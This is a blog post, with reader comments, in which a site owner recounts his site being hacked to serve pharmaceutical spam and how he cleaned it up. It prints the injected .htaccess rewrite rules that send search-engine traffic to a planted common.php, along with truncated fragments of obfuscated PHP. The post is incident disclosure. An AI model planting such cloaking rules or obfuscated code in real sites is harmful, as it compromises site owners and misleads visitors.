It’s just data

Hacked

This site was hacked.  A reader of the site noted that Google’s index of this site had been co-opted by dubious pharmaceutical offerings.  I’ll gladly thank that individual publicly if they give me permission to do so; but my email reply got bounced as spam.

The immediate culprit was the addition of the following lines to a number of .htaccess files:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteRule ^.*$    /common.php [L]
</IfModule>

I removed those lines, as well as the common.php file, and scanned any and all php files on my site.  I saw the addition of lines such as the following:

$FYAqxDo='p'.'r'. 'eg_repl'. 'ace';...
$IHxWfs=str_rot13('cert_ercynpr');...
$DcNZVHCi="eW6DLAlbeAki"^"...
$LYDmvYopCKSSSGcfCVNpsskU='ba'.'se64_'.'deco'.'de'...

I had old (vintage 2006) installations of PHP-openid-1.2.1 and PHP-yadis-1.0.2 that I am tentatively assuming were the ports of initial entry.

I also wiped my .ssh directory.  It has a private key there that was generated for this site that presumably was legitimate, but unused by me and now presumed compromised.  I never initiate sessions from this host, nor do I have any passwords saved there, so any damage caused was isolated.

I do daily backups of my site, which I keep for a week; as well as monthly backups that I basically keep forever.  In addition, as I recently migrated hosts, I have a hot backup.

The PHP hacks were done after I migrated but before March 1st.  The htaccess hacks were done over a week ago, but after March 1st.

Over the next few days, I’ll be looking at diffs of different snapshots of my site contents to see if there is anything else I missed.


Another victim of the Dreamhost .htaccess hack attack: What is Traffic Theft? [official Dreamhost blog]
This was posted by Dreamhost five days before you migrated. Does that mean that they knew about the attacks and didn’t prevent them, not even for new customers? I’m a relatively happy Dreamhost customer, but sometimes I think they’re a bit too easy going.

Posted by anonymous at

From that article:

these attacks have almost universally been due to insecure website software running on the site in question

I have every reason to believe that this is true in my case.

Posted by Sam Ruby at

To Dreamhost’s credit, I recently was the victim of another type of hack, where every PHP file on my site was prepended with a base64 encoded exploit. I was able to automatically revert the changes thanks to having installed WordPress and Mediawiki with Subversion, but I had a handful of other files (e.g. WordPress theme files) that were not under version control. I alerted Dreamhost to the attack, and they ran a script that scanned all the files in my account, cleaned the still affected files, made backups of the files they cleaned, and generated a very comprehensive email with all the details of what they did, and what I needed to do. I have to say, I was impressed. Sam, feel free to contact support an request a security scan just to be sure.

As an interesting aside, in my case, when I decoded the exploit, I could tell that the code specifically did not want to load when the page was requested by a search bot. This seems counter-intuitive, except that when Google discovers a site serving up malware for a period of time, they’ll drop you from their index, which means no more page views for our malware-friends. Which is kind of brilliant. The old hacks were all about SEO and Google Juice. The new hacks are all about money: ads and malware.

Posted by Justin Watt at

Sam, you’re a hacker. The dopes who broke the security on your website and planted ads and malware don’t deserve the honorific “hacker,” they’re crackers.

Posted by Joann Empson at

Google sent me a Notice of Suspected Hacking on May 17th.  I sent back a Reconsideration Request.  It is amazing to me how quickly Google’s index of this site changed when it was hacked, and how slow it has been in the progress to restore the index to its original state.

Posted by Sam Ruby at

Add your comment